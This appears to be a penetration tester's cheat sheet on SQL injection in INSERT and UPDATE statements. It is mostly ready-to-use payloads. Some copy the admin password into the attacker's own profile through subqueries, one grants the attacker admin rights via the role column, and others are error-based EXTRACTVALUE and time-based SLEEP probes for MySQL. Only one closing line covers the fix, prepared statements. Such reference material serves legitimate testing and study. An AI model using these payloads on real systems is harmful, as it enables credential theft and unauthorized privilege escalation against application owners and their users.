🧠 SQLi Context - INSERT and UPDATE

Vulnerable Code Example & Theory

Vulnerable Code INSERT and UPDATE statements are typically found in features that modify database state (e.g., registration, profile edits, password changes). Because these queries write data rather than just read it, you can often use them to extract data directly into your own user profile (Stored Data Exfiltration) or elevate privileges.

You will generally encounter these two backend structures:

1. The INSERT Context (VALUES clause):

INSERT INTO users (username, email) VALUES ('{input}', 'default@email.com')`

2. The UPDATE Context (SET clause):

UPDATE users SET email = '{input}' WHERE id = 1

(Note: If the injection is in the WHERE clause of an UPDATE, refer to the SQLi Context - WHERE and HAVING payloads).

Where To Look For The Vulnerability

• Profile Updates: “Edit Profile”, “Change Email” settings.
• Registration/Contact Forms: Account creation, submitting support tickets.
• Logging Mechanisms: User-Agent headers, X-Forwarded-For headers being saved to a database.

Exploitations

The “Stored” Extraction

If the application allows you to view the data you just submitted (like your own profile page), you can inject a subquery. The database will evaluate your subquery and save the secret data as your profile information.

-- 1. UPDATE Context (Modifying another column)
-- Structure: UPDATE users SET email = '{input}' WHERE id = 1
-- Goal: Overwrite your 'bio' or 'description' with the admin's password.
test@mail.com', bio = (SELECT password FROM users WHERE username='admin')--
 
-- 2. INSERT Context (Injecting into the next column)
-- Structure: INSERT INTO users (username, bio) VALUES ('{input}', 'default')
-- Goal: Place the subquery in the position of the second column.
test_user', (SELECT password FROM users WHERE username='admin'))--

Privilege Escalation

If you know the name of the role or privilege column, you can append it to the SET clause to grant yourself admin rights.

-- Structure: UPDATE users SET email = '{input}' WHERE id = 1
-- Goal: Append a modification to the role column.
hacker@mail.com', role = 'admin', is_admin = 1--

SQLi - Error-based

If the application doesn’t display your inputted data back to you, but does show database errors, force an error to leak the data.

-- 1. UPDATE Context
-- Structure: UPDATE users SET email = '{input}' WHERE id = 1
test', email = EXTRACTVALUE(1, CONCAT(0x7e, ({query})))--
 
-- 2. INSERT Context
-- Structure: INSERT INTO users (username, email) VALUES ('{input}', 'default')
test', EXTRACTVALUE(1, CONCAT(0x7e, ({query}))))--

SQLi - Time-based Blind

If the injection is entirely blind (no errors, no reflected data), fall back to time delays.

-- 1. UPDATE Context (MySQL)
-- Structure: UPDATE users SET email = '{input}' WHERE id = 1
test', email = IF((SUBSTRING(@@version,1,1)='5'), SLEEP(5), 'test')--
 
-- 2. INSERT Context (MySQL)
-- Structure: INSERT INTO users (username, email) VALUES ('{input}', 'default')
test', IF((SUBSTRING(@@version,1,1)='5'), SLEEP(5), 'test'))--

Mitigation

Fix: Use Prepared Statements. Ensure that parameters are bound strictly to values and never used to dynamically construct column names in SET clauses.

Related Usage

TABLE creation_date AS "Created" 
FROM "05 - Content" 
WHERE contains(techniques, this.file.link) AND contains(tags, "🚩") 
SORT file.name ASC